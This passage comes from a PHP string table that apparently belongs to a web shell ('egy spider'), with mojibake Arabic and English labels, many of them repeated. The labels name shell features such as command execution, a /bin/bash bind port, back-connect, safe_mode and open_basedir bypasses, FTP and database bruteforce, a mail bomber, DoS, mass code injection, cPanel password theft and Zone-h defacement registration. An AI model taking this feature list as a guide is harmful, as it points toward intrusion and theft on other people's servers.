ÇáÓíÝ ãæÏ È open_basedir, view dir list via glob() (PHP <= 5.2.x)', +'ar_text123'=>'ÊÎØì ÇáÓíÝ ãæÏ È open_basedir, read *.bzip file via [compress.bzip2://] (PHP <= 5.2.1)', +'ar_text124'=>'ÊÎØì ÇáÓíÝ ãæÏ È open_basedir, add data to file via error_log(php://) (PHP <= 5.1.4, 4.4.2)', +'ar_text126'=>'ÊÎØì ÇáÓíÝ ãæÏ È open_basedir, create file via session_save_path[NULL-byte] (PHP <= 5.2.0)', +'ar_text127'=>'ÊÎØì ÇáÓíÝ ãæÏ È open_basedir, add data to file via readfile(php://) (PHP <= 5.2.1, 4.4.4)', +'ar_text128'=>'Modify/Access file (touch)', +'ar_text129'=>'ÊÎØì ÇáÓíÝ ãæÏ È open_basedir, create file via fopen(srpath://) (PHP v5.2.0)', +'ar_text130'=>'ÊÎØì ÇáÓíÝ ãæÏ È open_basedir, read *.zip file via [zip://] (PHP <= 5.2.1)', +'ar_text131'=>'ÊÎØì ÇáÓíÝ ãæÏ È open_basedir, view file contest via symlink() (PHP <= 5.2.1)', +'ar_text132'=>'ÊÎØì ÇáÓíÝ ãæÏ È open_basedir, view dir list via symlink() (PHP <= 5.2.1)', +'ar_text133'=>'ÊÎØì ÇáÓíÝ ãæÏ È open_basedir, create file via session_save_path(TMPDIR) (PHP <= 5.2.4)', +'ar_err3'=>'Error! Can\'t connect to ftp', +'ar_err4'=>'Error! Can\'t login on ftp server', +'ar_err5'=>'Error! Can\'t change dir on ftp', +'ar_err6'=>'Error! Can\'t sent mail', +'ar_err7'=>'Mail send', +'ar_text1' =>'Executed command', +'ar_text2' =>'Execute command on server', +'ar_text33'=>'ÊÎØì ÇáÓíÝ ãæÏ È open_basedir with cURL functions(PHP <= 4.4.2, 5.1.4)', +'ar_text34'=>'ÞÑÇÆå ÇáãáÝÇÊ Úä ØÑíÞ ËÛÑÉ include function', +'ar_text35'=>'ÞÑÇÆå ÇáãáÝÇÊ Úä ØÑíÞ ËÛÑÉ load file in mysql', +'ar_text112'=>'ÞÑÇÆå ÇáãáÝÇÊ Úä ØÑíÞ ËÛÑÉ function mb_send_mail() (PHP <= 4.0-4.2.2, 5.x)', +'ar_text113'=>'ÊÎØì ÇáÓíÝ ãæÏ È safe_mode, view dir list via imap_list() (PHP <= 5.1.2)', +'ar_text114'=>'ÊÎØì ÇáÓíÝ ãæÏ È safe_mode, view file contest via imap_body() (PHP <= 5.1.2)', +'ar_text115'=>'ÊÎØì ÇáÓíÝ ãæÏ È safe_mode, copy file via copy(compress.zlib://) (PHP <= 4.4.2, 5.1.2)', +'ar_text120'=>'ÊÎØì ÇáÓíÝ ãæÏ È safe_mode via ini_restore (PHP <= 4.4.4, 5.1.6) by NST', +'ar_text121'=>'ÊÎØì ÇáÓíÝ ãæÏ È open_basedir, view dir list via fopen (PHP v4.4.0 memory leak) by NST', +'ar_text122'=>'ÊÎØì ÇáÓíÝ ãæÏ È open_basedir, view dir list via glob() (PHP <= 5.2.x)', +'ar_text123'=>'ÊÎØì ÇáÓíÝ ãæÏ È open_basedir, read *.bzip file via [compress.bzip2://] (PHP <= 5.2.1)', +'ar_text124'=>'ÊÎØì ÇáÓíÝ ãæÏ È open_basedir, add data to file via error_log(php://) (PHP <= 5.1.4, 4.4.2)', +'ar_text126'=>'ÊÎØì ÇáÓíÝ ãæÏ È open_basedir, create file via session_save_path[NULL-byte] (PHP <= 5.2.0)', +'ar_text127'=>'ÊÎØì ÇáÓíÝ ãæÏ È open_basedir, add data to file via readfile(php://) (PHP <= 5.2.1, 4.4.4)', +'ar_text128'=>'Modify/Access file (touch)', +'ar_text129'=>'ÊÎØì ÇáÓíÝ ãæÏ È open_basedir, create file via fopen(srpath://) (PHP v5.2.0)', +'ar_text130'=>'ÊÎØì ÇáÓíÝ ãæÏ È open_basedir, read *.zip file via [zip://] (PHP <= 5.2.1)', +'ar_text131'=>'ÊÎØì ÇáÓíÝ ãæÏ È open_basedir, view file contest via symlink() (PHP <= 5.2.1)', +'ar_text132'=>'ÊÎØì ÇáÓíÝ ãæÏ È open_basedir, view dir list via symlink() (PHP <= 5.2.1)', +'ar_text133'=>'ÊÎØì ÇáÓíÝ ãæÏ È open_basedir, create file via session_save_path(TMPDIR) (PHP <= 5.2.4)', +'ar_text142'=>'Downloaders', +'ar_text137'=>'Useful', +'ar_text128'=>'Modify/Access file (touch)', +'ar_text129'=>'ÊÎØì ÇáÓíÝ ãæÏ È open_basedir, create file via fopen(srpath://) (PHP v5.2.0)', +'ar_text130'=>'ÊÎØì ÇáÓíÝ ãæÏ È open_basedir, read *.zip file via [zip://] (PHP <= 5.2.1)', +'ar_text131'=>'ÊÎØì ÇáÓíÝ ãæÏ È open_basedir, view file contest via symlink() (PHP <= 5.2.1)', +'ar_text132'=>'ÊÎØì ÇáÓíÝ ãæÏ È open_basedir, view dir list via symlink() (PHP <= 5.2.1)', +'ar_text133'=>'ÊÎØì ÇáÓíÝ ãæÏ È open_basedir, create file via session_save_path(TMPDIR) (PHP <= 5.2.4)', +'ar_text134'=>'Database-bruteforce', +'ar_text135'=>'Dictionary', +'ar_text136'=>'Creating evil symlink', +'ar_text137'=>'Useful', +'ar_text138'=>'Dangerous', +'ar_text139'=>'Mail Bomber', +'ar_text140'=>'DoS', +'ar_text141'=>'Danger! Web-daemon crash possible.', +'ar_text142'=>'Downloaders', +'ar_text143'=>'Temp: ', +'ar_text144'=>'ÞÑÇÆå ÇáãáÝÇÊ Úä ØÑíÞ ËÛÑÉ load file in mysqli', +'ar_text145'=>'ÊÎØì ÇáÓíÝ ãæÏ È open_basedir, view dir list via realpath() (PHP <= 5.2.4)', +'ar_text146'=>'Max Interation', +'ar_text147'=>'', +'ar_text148'=>'', +'ar_text149'=>'', +'ar_text150'=>'', +'ar_err0'=>'Error! Can\'t write in file ', +'ar_err1'=>'Error! Can\'t read file ', +'ar_err2'=>'Error! Can\'t create ', +'ar_err3'=>'Error! Can\'t connect to ftp', +'ar_err4'=>'Error! Can\'t login on ftp server', +'ar_err5'=>'Error! Can\'t change dir on ftp', +'ar_err6'=>'Error! Can\'t sent mail', +'ar_err7'=>'Mail send', +'ar_text125'=>'Data', +'ar_text225'=>'ÒÑÚ ãáÝ áÊáÊÎØì ãä ÎáÇá ÞÇÚÏå ÇáÈíÇäÇÊ á 4.4.7 / 5.2.3 PHP ', +'ar_text226'=>'ÊÎØì ÇáÓíÝ ãæÏ ÈËÛÑå Root Directory: ', +'ar_text227'=>'ÒÑÚ ãáÝ áÊÎØì ÇáÓÝ ãæÏ ÈËÛÑå 4.4.2/5.1.2', +'ar_text228'=>'ÒÑÚ ãáÝ áÊÎØì ÇáÍãÇíå áãäÊÏÉ ÇáÝì Èì ', +'ar_text230'=>'ÒÑÚ ãáÝ áãÚÑÝå ßáãÇÊ ÇáãÑæÑ áãæÇÞÚ ÇáÓíÑÝÑ ÈÏæä ÊÔÝíÑ ', +'ar_text151'=>'ÊÎØì ÇáÓíÝ ãæÏ È chdir()and ftok() (PHP <= 5.2.6)', +'ar_text161'=>'ÊÎØì ÇáÓíÝ ãæÏ È posix_access() (posix ext) (PHP <= 5.2.6)', +'ar_text147'=>'', +'ar_text148'=>'', +'ar_text149'=>'', +'ar_text150'=>'', +'ar_text159'=>'ãÚáæãÇÊ Úä egy spider', +'ar_text152'=>'ÇÎÑ ÇáÇÎÈÇÑ', +'ar_text153'=>'ÎÑæÌ ', +'ar_text154'=>'æÖÚ ÇäÏßÓ ÓÑíÚå ', +'ar_text155'=>'ÍÞä ÇßæÇÏ ', +'ar_text156'=>'ÚÑÖ ÇáßæÏ ', +'ar_text157'=>'ÇáÊÓÌíá Ýì ÇáÒæä ÇÊÔ ', +'ar_text158'=>'ÇÏæÇÊ ÇáÊÔÝíÑ ', +'ar_text160'=>'ÇáÑÆÓíå ', +'ar_text162'=>'ÇÞÝÇá ÇáÏæÇá æÊÎØì ÇáÓíÝ ãæÏ ãä ÎáÇá ionCube (PHP <= 5.2.4)', +'ar_text163'=>'ÊÔÛíá ÇáÈíÑá Úáì ÇáÓíÑÝÑ ', +'ar_text170'=>' ÊÎØì ÇáÓíÝ ãæÏ æÇáÏæÇá È Posix_getpw(PHP <= 4.2.0)', +'ar_text171'=>' PHP (Win32std) Extension ÊÎØì ÇáÓíÝ ãæÏ æÊÎØì ÇáÏæÇá (PHP <= 5.2.3)', +'ar_text180'=>'ÇÑÓá ãáÇÍÙÇÊß æÇÊÕá Èì ', +/* --------------------------------------------------------------- */ +'eng_butt1' =>'Execute', +'eng_butt2' =>'Upload', +'eng_butt3' =>'Bind', +'eng_butt4' =>'Connect', +'eng_butt5' =>'Run', +'eng_butt6' =>'Change', +'eng_butt7' =>'Show', +'eng_butt8' =>'Test', +'eng_butt9' =>'Dump', +'eng_butt10'=>'Save', +'eng_butt11'=>'Edit file', +'eng_butt12'=>'Find', +'eng_butt13'=>'Create/Delete', +'eng_butt14'=>'Download', +'eng_butt15'=>'Send', +'eng_text1' =>'Executed command', +'eng_text2' =>'Execute command on server', +'eng_text3' =>'Run command', +'eng_text4' =>'Work directory', +'eng_text5' =>'Upload files on server', +'eng_text6' =>'Local file', +'eng_text7' =>'Aliases', +'eng_text8' =>'Select alias', +'eng_text9' =>'Bind port to /bin/bash', +'eng_text10'=>'Port', +'eng_text11'=>'Password for access', +'eng_text12'=>'back-connect', +'eng_text13'=>'IP', +'eng_text14'=>'Port', +'eng_text15'=>'Upload files from remote server', +'eng_text16'=>'With', +'eng_text17'=>'Remote file', +'eng_text18'=>'Local file', +'eng_text19'=>'Exploits', +'eng_text20'=>'Use', +'eng_text21'=>' New name', +'eng_text22'=>'datapipe', +'eng_text23'=>'Local port', +'eng_text24'=>'Remote host', +'eng_text25'=>'Remote port', +'eng_text26'=>'Use', +'eng_text28'=>'Work in safe_mode', +'eng_text29'=>'ACCESS DENIED', +'eng_text30'=>'Cat file', +'eng_text31'=>'File not found', +'eng_text32'=>'Eval PHP code', +'eng_text33'=>'Test bypass open_basedir with cURL functions(PHP <= 4.4.2, 5.1.4)', +'eng_text34'=>'Test bypass safe_mode with include function', +'eng_text35'=>'Test bypass safe_mode with load file in mysql', +'eng_text36'=>'Database . Table', +'eng_text37'=>'Login', +'eng_text38'=>'Password', +'eng_text39'=>'Database', +'eng_text40'=>'Dump database table', +'eng_text41'=>'Save dump in file', +'eng_text42'=>'Edit files', +'eng_text43'=>'File for edit', +'eng_text44'=>'Can\'t edit file! Only read access!', +'eng_text45'=>'File saved', +'eng_text46'=>'Show phpinfo()', +'eng_text47'=>'Show variables from php.ini', +'eng_text48'=>'Delete temp files', +'eng_text49'=>'Delete script from server', +'eng_text50'=>'View cpu info', +'eng_text51'=>'View memory info', +'eng_text52'=>'Find text', +'eng_text53'=>'In dirs', +'eng_text54'=>'Find text in files', +'eng_text55'=>'Only in files', +'eng_text56'=>'Nothing :(', +'eng_text57'=>'Create/Delete File/Dir', +'eng_text58'=>'name', +'eng_text59'=>'file', +'eng_text60'=>'dir', +'eng_text61'=>'File created', +'eng_text62'=>'Dir created', +'eng_text63'=>'File deleted', +'eng_text64'=>'Dir deleted', +'eng_text65'=>'Create', +'eng_text66'=>'Delete', +'eng_text67'=>'Chown/Chgrp/Chmod', +'eng_text68'=>'Command', +'eng_text69'=>'param1', +'eng_text70'=>'param2', +'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...", +'eng_text72'=>'Text for find', +'eng_text73'=>'Find in folder', +'eng_text74'=>'Find in files', +'eng_text75'=>'* you can use regexp', +'eng_text76'=>'Search text in files via find', +'eng_text80'=>'Type', +'eng_text81'=>'Net', +'eng_text82'=>'Databases', +'eng_text83'=>'Run SQL query', +'eng_text84'=>'SQL query', +'eng_text85'=>'Test bypass safe_mode with commands execute via MSSQL server', +'eng_text86'=>'Download files from server', +'eng_text87'=>'Download files from remote ftp-server', +'eng_text88'=>'server:port', +'eng_text89'=>'File on ftp', +'eng_text90'=>'Transfer mode', +'eng_text91'=>'Archivation', +'eng_text92'=>'without arch.', +'eng_text93'=>'FTP', +'eng_text94'=>'FTP-bruteforce', +'eng_text95'=>'Users list', +'eng_text96'=>'Can\'t get users list', +'eng_text97'=>'checked: ', +'eng_text98'=>'success: ', +'eng_text99'=>'/etc/passwd', +'eng_text100'=>'Send file to remote ftp server', +'eng_text101'=>'Use reverse (user -> resu)', +'eng_text102'=>'Mail', +'eng_text103'=>'Send email', +'eng_text104'=>'Send file to email', +'eng_text105'=>'To', +'eng_text106'=>'From', +'eng_text107'=>'Subj', +'eng_text108'=>'Mail', +'eng_text109'=>'Hide', +'eng_text110'=>'Show', +'eng_text111'=>'SQL-Server : Port', +'eng_text112'=>'Test bypass safe_mode with function mb_send_mail() (PHP <= 4.0-4.2.2, 5.x)', +'eng_text113'=>'Test bypass safe_mode, view dir list via imap_list() (PHP <= 5.1.2)', +'eng_text114'=>'Test bypass safe_mode, view file contest via imap_body() (PHP <= 5.1.2)', +'eng_text115'=>'Test bypass safe_mode, copy file via copy(compress.zlib://) (PHP <= 4.4.2, 5.1.2)', +'eng_text116'=>'Copy from', +'eng_text117'=>'to', +'eng_text118'=>'File copied', +'eng_text119'=>'Cant copy file', +'eng_text120'=>'Test bypass safe_mode via ini_restore (PHP <= 4.4.4, 5.1.6) by NST', +'eng_text121'=>'Test bypass open_basedir, view dir list via fopen (PHP v4.4.0 memory leak) by NST', +'eng_text122'=>'Test bypass open_basedir, view dir list via glob() (PHP <= 5.2.x)', +'eng_text123'=>'Test bypass open_basedir, read *.bzip file via [compress.bzip2://] (PHP <= 5.2.1)', +'eng_text124'=>'Test bypass open_basedir, add data to file via error_log(php://) (PHP <= 5.1.4, 4.4.2)', +'eng_text125'=>'Data', +'eng_text126'=>'Test bypass open_basedir, create file via session_save_path[NULL-byte] (PHP <= 5.2.0)', +'eng_text127'=>'Test bypass open_basedir, add data to file via readfile(php://) (PHP <= 5.2.1, 4.4.4)', +'eng_text128'=>'Modify/Access file (touch)', +'eng_text129'=>'Test bypass open_basedir, create file via fopen(srpath://) (PHP v5.2.0)', +'eng_text130'=>'Test bypass open_basedir, read *.zip file via [zip://] (PHP <= 5.2.1)', +'eng_text131'=>'Test bypass open_basedir, view file contest via symlink() (PHP <= 5.2.1)', +'eng_'=>'Test bypass open_basedir, view dir list via symlink() (PHP <= 5.2.1)', +'eng_text133'=>'Test bypass open_basedir, create file via session_save_path(TMPDIR) (PHP <= 5.2.4)', +'eng_text134'=>'Database-bruteforce', +'eng_text135'=>'Dictionary', +'eng_text136'=>'Creating evil symlink', +'eng_text137'=>'Useful', +'eng_text138'=>'Dangerous', +'eng_text139'=>'Mail Bomber', +'eng_text140'=>'DoS', +'eng_text141'=>'Danger! Web-daemon crash possible.', +'eng_text142'=>'Downloaders', +'eng_text143'=>'Temp: ', +'eng_text144'=>'Test bypass safe_mode with load file in mysqli', +'eng_text145'=>'Test bypass open_basedir, view dir list via realpath() (PHP <= 5.2.4)', +'eng_text146'=>'Max Interation', +'eng_text147'=>'', +'eng_text148'=>'', +'eng_text149'=>'', +'eng_text150'=>'', +'eng_err0'=>'Error! Can\'t write in file ', +'eng_err1'=>'Error! Can\'t read file ', +'eng_err2'=>'Error! Can\'t create ', +'eng_err3'=>'Error! Can\'t connect to ftp', +'eng_err4'=>'Error! Can\'t login on ftp server', +'eng_err5'=>'Error! Can\'t change dir on ftp', +'eng_err6'=>'Error! Can\'t sent mail', +'eng_err7'=>'Mail send', +'eng_text1' =>'Executed command', +'eng_text2' =>'Execute command on server', +'eng_text3' =>'Run command', +'eng_text4' =>'Work directory', +'eng_text5' =>'Upload files on server', +'eng_text6' =>'Local file', +'eng_text7' =>'Aliases', +'eng_text8' =>'Select alias', +'eng_butt1' =>'Execute', +'eng_butt2' =>'Upload', +'eng_text9' =>'Bind port to /bin/bash', +'eng_text10'=>'Port', +'eng_text11'=>'Password for access', +'eng_butt3' =>'Bind', +'eng_text12'=>'back-connect', +'eng_text13'=>'IP', +'eng_text14'=>'Port', +'eng_butt4' =>'Connect', +'eng_text15'=>'Upload files from remote server', +'eng_text16'=>'With', +'eng_text17'=>'Remote file', +'eng_text18'=>'Local file', +'eng_text19'=>'Exploits', +'eng_text20'=>'Use', +'eng_text21'=>' New name', +'eng_text22'=>'datapipe', +'eng_text23'=>'Local port', +'eng_text24'=>'Remote host', +'eng_text25'=>'Remote port', +'eng_text26'=>'Use', +'eng_butt5' =>'Run', +'eng_text28'=>'Work in safe_mode', +'eng_text29'=>'ACCESS DENIED', +'eng_butt6' =>'Change', +'eng_text30'=>'Cat file', +'eng_butt7' =>'Show', +'eng_text31'=>'File not found', +'eng_text32'=>'Eval PHP code', +'eng_text33'=>'Test bypass open_basedir with cURL functions', +'eng_butt8' =>'Test', +'eng_text34'=>'Test bypass safe_mode with include function', +'eng_text35'=>'Test bypass safe_mode with load file in mysql', +'eng_text36'=>'Database . Table', +'eng_text37'=>'Login', +'eng_text38'=>'Password', +'eng_text39'=>'Database', +'eng_text40'=>'Dump database table', +'eng_butt9' =>'Dump', +'eng_text41'=>'Save dump in file', +'eng_text42'=>'Edit files', +'eng_text43'=>'File for edit', +'eng_butt10'=>'Save', +'eng_text44'=>'Can\'t edit file! Only read access!', +'eng_text45'=>'File saved', +'eng_text46'=>'Show phpinfo()', +'eng_text47'=>'Show variables from php.ini', +'eng_text48'=>'Delete temp files', +'eng_butt11'=>'Edit file', +'eng_text49'=>'Delete script from server', +'eng_text50'=>'View cpu info', +'eng_text51'=>'View memory info', +'eng_text52'=>'Find text', +'eng_text53'=>'In dirs', +'eng_text54'=>'Find text in files', +'eng_butt12'=>'Find', +'eng_text55'=>'Only in files', +'eng_text56'=>'Nothing :(', +'eng_text57'=>'Create/Delete File/Dir', +'eng_text58'=>'name', +'eng_text59'=>'file', +'eng_text60'=>'dir', +'eng_butt13'=>'Create/Delete', +'eng_text61'=>'File created', +'eng_text62'=>'Dir created', +'eng_text63'=>'File deleted', +'eng_text64'=>'Dir deleted', +'eng_butt65'=>'Create', +'eng_text65'=>'Create', +'eng_text66'=>'Delete', +'eng_text67'=>'Chown/Chgrp/Chmod', +'eng_text68'=>'Command', +'eng_text69'=>'param1', +'eng_text70'=>'param2', +'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...", +'eng_text72'=>'Text for find', +'eng_text73'=>'Find in folder', +'eng_text74'=>'Find in files', +'eng_text75'=>'* you can use regexp', +'eng_text76'=>'Search text in files via find', +'eng_text80'=>'Type', +'eng_text81'=>'Net', +'eng_text82'=>'Databases', +'eng_text83'=>'Run SQL query', +'eng_text84'=>'SQL query', +'eng_text85'=>'Test bypass safe_mode with commands execute via MSSQL server', +'eng_text86'=>'Download files from server', +'eng_butt14'=>'Download', +'eng_text87'=>'Download files from remote ftp-server', +'eng_text88'=>'FTP-server:port', +'eng_text89'=>'File on ftp', +'eng_text90'=>'Transfer mode', +'eng_text91'=>'Archivation', +'eng_text92'=>'without archivation', +'eng_text93'=>'FTP', +'eng_text94'=>'FTP-bruteforce', +'eng_text95'=>'Users list', +'eng_text96'=>'Can\'t get users list', +'eng_text97'=>'checked: ', +'eng_text98'=>'success: ', +'eng_text99'=>'* use username from /etc/passwd for ftp login and password', +'eng_text100'=>'Send file to remote ftp server', +'eng_text101'=>'Use reverse (user -> resu) login for password', +'eng_text102'=>'Mail', +'eng_text103'=>'Send email', +'eng_text104'=>'Send file to email', +'eng_text105'=>'To', +'eng_text106'=>'From', +'eng_text107'=>'Subj', +'eng_butt15'=>'Send', +'eng_text108'=>'Mail', +'eng_text109'=>'Hide', +'eng_text110'=>'Show', +'eng_text111'=>'SQL-Server : Port', +'eng_text112'=>'Test bypass safe_mode with function mb_send_mail', +'eng_text113'=>'Test bypass safe_mode, view dir list via imap_list', +'eng_text114'=>'Test bypass safe_mode, view file contest via imap_body', +'eng_text115'=>'Test bypass safe_mode, copy file via compress.zlib:// in function copy()', +'eng_text116'=>'Copy from', +'eng_text117'=>'to', +'eng_text118'=>'File copied', +'eng_text119'=>'Cant copy file', +'eng_err0'=>'Error! Can\'t write in file ', +'eng_err1'=>'Error! Can\'t read file ', +'eng_err2'=>'Error! Can\'t create ', +'eng_err3'=>'Error! Can\'t connect to ftp', +'eng_err4'=>'Error! Can\'t login on ftp server', +'eng_err5'=>'Error! Can\'t change dir on ftp', +'eng_err6'=>'Error! Can\'t sent mail', +'eng_err7'=>'Mail send', +'eng_text200'=>'read file from vul copy()', +'eng_text500'=>'read file from id()', +'eng_text555'=>'read file from imap()', +'eng_text202'=>'where file in server', +'eng_text300'=>'read file from vul curl()', +'eng_text203'=>'read file from vul ini_restore()', +'eng_text204'=>'write shell from vul error_log()', +'eng_text205'=>'write shell in this side', +'eng_text206'=>'read dir', +'eng_text207'=>'read dir from vul reg_glob', +'eng_text208'=>'execute with function', +'eng_text209'=>'read dir from vul root', +'eng_text210'=>'DeZender ', +'eng_text211'=>'::safe_mode off::', +'eng_text212'=>'colse safe_mode with php.ini', +'eng_text213'=>'colse security_mod with .htaccess', +'eng_text214'=>'Admin name', +'eng_text215'=>'IRC server ', +'eng_text216'=>'#room name', +'eng_text217'=>'server', +'eng_text218'=>'write ini.php file to close safe_mode with ini_restore vul', +'eng_text225'=>'MySQL Safe Mode Bypass 4.4.7 / 5.2.3 PHP ', +'eng_text226'=>'Safe Mode Bpass Root Directory: ', +'eng_text227'=>'Safe_Mode Bypass 4.4.2/5.1.2: ', +'eng_text228'=>'tools for hacker vb ', +'eng_text230'=>'know pass of cpanel ', +'eng_text219'=>'Get file to server in safe_mode and change name', +'eng_text220'=>'show file with symlink vul', +'eng_text221'=>'zip file in server to download', +'eng_text222'=>'2 symlink use vul', +'eng_text223'=>'read file from funcution', +'eng_text224'=>'read file from PLUGIN ', +'eng_butt1' =>'Execute', +'eng_butt2' =>'Upload', +'eng_butt3' =>'Bind', +'eng_butt4' =>'Connect', +'eng_butt5' =>'Run', +'eng_butt6' =>'Change', +'eng_butt7' =>'Show', +'eng_butt8' =>'Test', +'eng_butt9' =>'Dump', +'eng_butt10'=>'Save', +'eng_butt11'=>'Edit file', +'eng_butt12'=>'Find', +'eng_butt13'=>'Create/Delete', +'eng_butt14'=>'Download', +'eng_butt15'=>'Send', +'eng_text1' =>'Executed command', +'eng_text2' =>'Execute command on server', +'eng_text3' =>'Run command', +'eng_text4' =>'Work directory', +'eng_text5' =>'Upload files on server', +'eng_text6' =>'Local file', +'eng_text7' =>'Aliases', +'eng_text8' =>'Select alias', +'eng_text9' =>'Bind port to /bin/bash', +'eng_text10'=>'Port', +'eng_text11'=>'Password for access', +'eng_text12'=>'back-connect', +'eng_text13'=>'IP', +'eng_text14'=>'Port', +'eng_text15'=>'Upload files from remote server', +'eng_text16'=>'With', +'eng_text17'=>'Remote file', +'eng_text18'=>'Local file', +'eng_text19'=>'Exploits', +'eng_text20'=>'Use', +'eng_text21'=>' New name', +'eng_text22'=>'datapipe', +'eng_text23'=>'Local port', +'eng_text24'=>'Remote host', +'eng_text25'=>'Remote port', +'eng_text26'=>'Use', +'eng_text28'=>'Work in safe_mode', +'eng_text29'=>'ACCESS DENIED', +'eng_text30'=>'Cat file', +'eng_text31'=>'File not found', +'eng_text32'=>'Eval PHP code', +'eng_text33'=>'Test bypass open_basedir with cURL functions(PHP <= 4.4.2, 5.1.4)', +'eng_text34'=>'Test bypass safe_mode with include function', +'eng_text35'=>'Test bypass safe_mode with load file in mysql', +'eng_text36'=>'Database . Table', +'eng_text37'=>'Login', +'eng_text38'=>'Password', +'eng_text39'=>'Database', +'eng_text40'=>'Dump database table', +'eng_text41'=>'Save dump in file', +'eng_text42'=>'Edit files', +'eng_text43'=>'File for edit', +'eng_text44'=>'Can\'t edit file! Only read access!', +'eng_text45'=>'File saved', +'eng_text46'=>'Show phpinfo()', +'eng_text47'=>'Show variables from php.ini', +'eng_text48'=>'Delete temp files', +'eng_text49'=>'Delete script from server', +'eng_text50'=>'View cpu info', +'eng_text51'=>'View memory info', +'eng_text52'=>'Find text', +'eng_text53'=>'In dirs', +'eng_text54'=>'Find text in files', +'eng_text55'=>'Only in files', +'eng_text56'=>'Nothing :(', +'eng_text57'=>'Create/Delete File/Dir', +'eng_text58'=>'name', +'eng_text59'=>'file', +'eng_text60'=>'dir', +'eng_text61'=>'File created', +'eng_text62'=>'Dir created', +'eng_text63'=>'File deleted', +'eng_text64'=>'Dir deleted', +'eng_text65'=>'Create', +'eng_text66'=>'Delete', +'eng_text67'=>'Chown/Chgrp/Chmod', +'eng_text68'=>'Command', +'eng_text69'=>'param1', +'eng_text70'=>'param2', +'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...", +'eng_text72'=>'Text for find', +'eng_text73'=>'Find in folder', +'eng_text74'=>'Find in files', +'eng_text75'=>'* you can use regexp', +'eng_text76'=>'Search text in files via find', +'eng_text80'=>'Type', +'eng_text81'=>'Net', +'eng_text82'=>'Databases', +'eng_text83'=>'Run SQL query', +'eng_text84'=>'SQL query', +'eng_text85'=>'Test bypass safe_mode with commands execute via MSSQL server', +'eng_text86'=>'Download files from server', +'eng_text87'=>'Download files from remote ftp-server', +'eng_text88'=>'server:port', +'eng_text89'=>'File on ftp', +'eng_text90'=>'Transfer mode', +'eng_text91'=>'Archivation', +'eng_text92'=>'without arch.', +'eng_text93'=>'FTP', +'eng_text94'=>'FTP-bruteforce', +'eng_text95'=>'Users list', +'eng_text96'=>'Can\'t get users list', +'eng_text97'=>'checked: ', +'eng_text98'=>'success: ', +'eng_text99'=>'/etc/passwd', +'eng_text100'=>'Send file to remote ftp server', +'eng_text101'=>'Use reverse (user -> resu)', +'eng_text102'=>'Mail', +'eng_text103'=>'Send email', +'eng_text104'=>'Send file to email', +'eng_text105'=>'To', +'eng_text106'=>'From', +'eng_text107'=>'Subj', +'eng_text108'=>'Mail', +'eng_text109'=>'Hide', +'eng_text110'=>'Show', +'eng_text111'=>'SQL-Server : Port', +'eng_text112'=>'Test bypass safe_mode with function mb_send_mail() (PHP <= 4.0-4.2.2, 5.x)', +'eng_text113'=>'Test bypass safe_mode, view dir list via imap_list() (PHP <= 5.1.2)', +'eng_text114'=>'Test bypass safe_mode, view file contest via imap_body() (PHP <= 5.1.2)', +'eng_text115'=>'Test bypass safe_mode, copy file via copy(compress.zlib://) (PHP <= 4.4.2, 5.1.2)', +'eng_text116'=>'Copy from', +'eng_text117'=>'to', +'eng_text118'=>'File copied', +'eng_text119'=>'Cant copy file', +'eng_text120'=>'Test bypass safe_mode via ini_restore (PHP <= 4.4.4, 5.1.6) by NST', +'eng_text121'=>'Test bypass open_basedir, view dir list via fopen (PHP v4.4.0 memory leak) by NST', +'eng_text122'=>'Test bypass open_basedir, view dir list via glob() (PHP <= 5.2.x)', +'eng_text123'=>'Test bypass open_basedir, read *.bzip file via [compress.bzip2://] (PHP <= 5.2.1)', +'eng_text124'=>'Test bypass open_basedir, add data to file via error_log(php://) (PHP <= 5.1.4, 4.4.2)', +'eng_text125'=>'Data', +'eng_text126'=>'Test bypass open_basedir, create file via session_save_path[NULL-byte] (PHP <= 5.2.0)', +'eng_text127'=>'Test bypass open_basedir, add data to file via readfile(php://) (PHP <= 5.2.1, 4.4.4)', +'eng_text128'=>'Modify/Access file (touch)', +'eng_text129'=>'Test bypass open_basedir, create file via fopen(srpath://) (PHP v5.2.0)', +'eng_text130'=>'Test bypass open_basedir, read *.zip file via [zip://] (PHP <= 5.2.1)', +'eng_text131'=>'Test bypass open_basedir, view file contest via symlink() (PHP <= 5.2.1)', +'eng_text132'=>'Test bypass open_basedir, view dir list via symlink() (PHP <= 5.2.1)', +'eng_text133'=>'Test bypass open_basedir, create file via session_save_path(TMPDIR) (PHP <= 5.2.4)', +'eng_text134'=>'Database-bruteforce', +'eng_text135'=>'Dictionary', +'eng_text136'=>'Creating evil symlink', +'eng_text137'=>'Useful', +'eng_text138'=>'Dangerous', +'eng_text139'=>'Mail Bomber', +'eng_text140'=>'DoS', +'eng_text141'=>'Danger! Web-daemon crash possible.', +'eng_text142'=>'Downloaders', +'eng_text143'=>'Temp: ', +'eng_text144'=>'Test bypass safe_mode with load file in mysqli', +'eng_text145'=>'Test bypass open_basedir, view dir list via realpath() (PHP <= 5.2.4)', +'eng_text146'=>'Max Interation', +'eng_text151'=>'Test bypass safe_mode with chdir()and ftok() (PHP <= 5.2.6)', +'eng_text161'=>'Test bypass safe_mode with posix_access() (posix ext) (PHP <= 5.2.6)', +'eng_text162'=>'ionCube extension safe_mode and disable_functions protections bypass (PHP <= 5.2.4)', +'eng_text163'=>'PHP Perl Extension Safe_mode Bypass Exploit', +'eng_text170'=>' Test bypass safe_mode and Open_basedir Settings by Posix_getpw (PHP <= 4.2.0)', +'eng_text171'=>' PHP (Win32std) Extension safe_mode/disable_functions Protections Bypass (PHP <= 5.2.3)', +'eng_text147'=>'', +'eng_text148'=>'', +'eng_text149'=>'', +'eng_text150'=>'', +'eng_text159'=>'About egy spider', +'eng_text152'=>'Latest News', +'eng_text153'=>'Logout ', +'eng_text154'=>'Quick index ', +'eng_text155'=>'Mass Code Injection ', +'eng_text156'=>'File source ', +'eng_text157'=>'Registration in Zone-h ', +'eng_text158'=>'Hash Tools ', +'eng_text160'=>'Home Shell ', +'eng_text180'=>'Send Your Comments And Contacted Me ', +'eng_err0'=>'Error! Can\'t write in file ', +'eng_err1'=>'Error! Can\'t read file ', +'eng_err2'=>'Error! Can\'t create ', +'eng_err3'=>'Error! Can\'t 